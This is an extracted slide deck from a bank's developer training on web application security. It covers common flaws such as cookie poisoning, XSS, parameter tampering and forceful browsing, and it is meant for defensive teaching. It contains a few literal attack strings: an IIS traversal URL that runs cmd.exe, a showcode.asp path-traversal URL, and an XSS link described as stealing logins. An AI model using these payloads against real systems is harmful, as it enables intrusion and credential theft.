Bank One App Sec Training

Web Application Security“Securing from the Ground Up”

Presenters: Charles Smith & Michael Spaulding

What is Web Application Security?

Web Applications exist in many forms. Some search, some count, others even transfer money within your bank accounts. Web Applications are employed to carry out many mission-critical tasks and if anything is certain, our reliance upon web applications will continue to grow.

So Simply Put, Web Application Security is the

achievement of an acceptable level of security assurance of a web

application solution.Security Assurance = CIA

Why is web application security important?

Before software functionality was capable of being delivered via the web, software developer’s security concerns were relative to network and OS level threats given their user-base was limited to internal or wan networks. All this has now changed. Web developers now create software that runs upon web servers accessed by anyone, anywhere. The scope and magnitude of their software delivery has increased exponentially and in so doing, security issues have also risen that are now web-centric and totally bypass the legacy network and OS based defensive strategy.

- Browser Hi-Jacking- Cookie Theft- Server & Client Compromise- Denial of Service- Abuse- User Privacy Invasion

Pay Me Now Or Pay Me Later

Security problems are found in the Design, Build and Deployment/Maintenance phases of the application lifecycle. A problem identified in any phase after the initial build may cause the code to go back to the design stage to be addressed, and then to pass through the necessary development phases again. This obviously adds time, cost and resource conflicts to the entire development process. It is well known that fixing a problem found in the Testing phase is about 2-5 times more expensive than fixing it in the coding phase, and fixing a problem found in the Maintenance (deployment and beyond) phase is 5-7times more expensive than fixing it in the coding phase

What Is The Ultimate Cost For Not Addressing Security Early?

The Fourth Level of Web Security

Security

Behavior

Antivirus

Disruption

Desktop

1

Encryption

Interception

Transport

2

Manual Patching

Web Perversion

WebApplications

4

Firewall

Illegal Access

3

Network

Desktop Transport Network Web Applications

AntivirusProtection

Encryption(SSL)

Firewalls/Advanced Routers

Manual Patchingand Code Review

Digital Security Landscape

The business logic that enables: User’s interaction with Web site Transacting/interfacing with back-

end data systems (databases, CRM, ERP etc)

In the form of: 3rd party packaged software; i.e.

web server, shopping cart sw, personalization engines etc.

Code developed in-house / web builder / system integrator

Input and Output flow through each layer of the application

A break in any layer breaks the whole application

Web Server

User Interface Code

Front end Application

Backend Application

Database

Data

User InputHTML/HTTP

Browser

What is a Web Application

The manipulation of web applications for:

Web Threat Objectives?

Through a browser, a hacker can use even the smallest bug or backdoor to change, or distort, the intent of the application.

Application Attack Objective

Form field: collect data Buffer overflow Crash servers/close business

Online shopping Hidden fields eShoplifting

Sloppy code Debug options Download proprietary database

Text Field: collect data Cross Site scripting eHijacking - Get account info

Customer account Cookie poisoning Identity theft

Web Manipulation Examples

The results of over 300 AppAudits conducted with AppScan

97% of Sites Are Vulnerable

7%

7%7%

4%

25%

The Web’s 7 Deadly Sins

Hidden Field ManipulationHidden Field Manipulation Cookie PoisoningCookie Poisoning Application Buffer OverflowApplication Buffer Overflow Third-Party MisconfigurationThird-Party Misconfiguration Cross-Site Server ScriptingCross-Site Server Scripting Parameter TamperingParameter Tampering SQL InjectionSQL Injection

Hidden Field Manipulation

Vulnerability explanationVulnerability explanation:

The application sends data to the client using a hidden field in a form. Modifying the hidden field damages the data returning to the web application

Why Hidden Field ManipulationWhy Hidden Field Manipulation:

Passing hidden fields is a simple and efficient way to pass information from one part of the application to another (or between two applications) without the use of complex backend systems.

As a result of this manipulationAs a result of this manipulation :

The application acts according to the changed information and not according to the original

data

Hidden Field Manipulation - Example




Cookie Poisoning


The session information contained within the cookie is changed to a different value causing the application to shift to the new session ID.

Why Cookie PoisoningWhy Cookie Poisoning:

Some session IDs are not-secure e.g. not encrypted or weakly encrypted or hashed. This is generally due to lack of cryptographic expertise of the part of developers.


Hackers can assume the user’s identity and have access to that user’s information – identity theft/impersonation

Cookie Poisoning - Example




Backdoor & Debug options


The application has hidden debug options that can be activated by sending a specific parameter or sequence

Why Backdoor and Debug optionsWhy Backdoor and Debug options:

1. Leaving debug options in the code enables developers to find and fix bugs faster

2. Developers leave backdoors as a way of guaranteeing their access to the system


Activation of the hidden debug option allows the hacker to have extreme access to the application (usually unlimited).

Backdoor & Debug options - Example



Application Buffer Overflow


Exploiting a flaw in a form to overload the server with excess information - sending more characters will cause it to misbehave

Why Application Buffer OverflowWhy Application Buffer Overflow:

The application does not check the number of characters


The application crashes and in many cases causes the whole site to shut down (DoS). In other cases, the application executes the code received as the input

Application Buffer Overflow- Example





Stealth Commanding


Concealing dangerous commands via a Trojan horse with the intent to run malicious or unauthorized code that is damaging to the site.

Why Stealth CommandingWhy Stealth Commanding:

Applications tend to use the content received from a field to evaluate a new command. However, they assume that the content is only data and not executable code.


The hacker can perform any command on the web-server, including complete shut down, defacement, or access to all information

Stealth Commanding - Example

Stealth Commanding - Example

Known Vulnerabilities

Vulnerability explanationVulnerability explanation::

Some technology used in sites have inherent weaknesses that a persistent hacker, or a hacker with automated scanning tools, can exploit easily. Users are dependent on patches from the developer. After discovered in one site they can be used in all the sites using the same component

Why Known VulnerabilitiesWhy Known Vulnerabilities:

Third party vendors have bugs (Microsoft IIS etc). Since their products appear in many sites they are examined thoroughly by a large number of hackers

As a result of this manipulationAs a result of this manipulation:

Once a bug is found, large parts of the internet are scanned and exploited. The actual result varies according to the vulnerability type, but ability to gain the administrators’ passwords and take control of the site is not unusual!

/msadc/..à?¯..à?¯..à?¯..à..¯?/winnt/system32/cmd.exe?/c+dir+c:

Known Vulnerabilities - Example

3rd Party Misconfigurations


A misconfiquration, or human error during install of 3rd party software can cause default passwords or settings unchanged – open invitation for attack

Why 3Why 3rdrd party misconfiqurations party misconfiqurations:

Occurs during the installation and maintenance of the 3rd party application


Through a configuration error a hacker could create a new database that renders the existing one unusable by the site

3rd Party Misconfiguration - Example

/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../..

Cross Site Scripting


A third party creates a link (or sends an email) and the URL contains a parameter with a script – once the user connects, the site runs this script

Why Cross Site ScriptingWhy Cross Site Scripting:

Many parameters are implanted within the HTML of following responses, while not checking their content for scripts.

As a result of this manipulationAs a result of this manipulation:

“Virtual hijacking” of the session. Any information flowing between the legitimate user and site can be manipulated or transmitted to the evil 3rd party.

Press this link to get to your bank

Underlying link: http://www.mybank.com?a=<evil javascript>

The JavaScript program collects and sends user names and passwords

Enter your login information

1

2

Username

Password3

Cross Site Scripting - Example

Parameter Tampering


Parameters are used to obtain information from the client. This information can be changed in a site’s URL parameter

Why Parameter TamperingWhy Parameter Tampering:

Developers focus on the legal values of parameters and how they should be utilized. Little if any attention is given to the incorrect values


The application can perform a function that was not intended by its developer like giving access to customer information

Parameter Tampering - Example

Parameter Tampering - Example

Forceful Browsing


By “guessing” the names of files and directories the hacker can view them without going through the business logic leading to those objects

Why forceful browsingWhy forceful browsing:

1. Default files are left during the installation process

2. New files that should not be exposed and old files which should be removed are left (outside the normal flow) by mistake


Content (log files, administration facilities, application source code) is revealed due to file and directory access

Forceful Browsing - Example



Thank You

Feedback?

Recommendations?

Technology

Bank One App Sec Training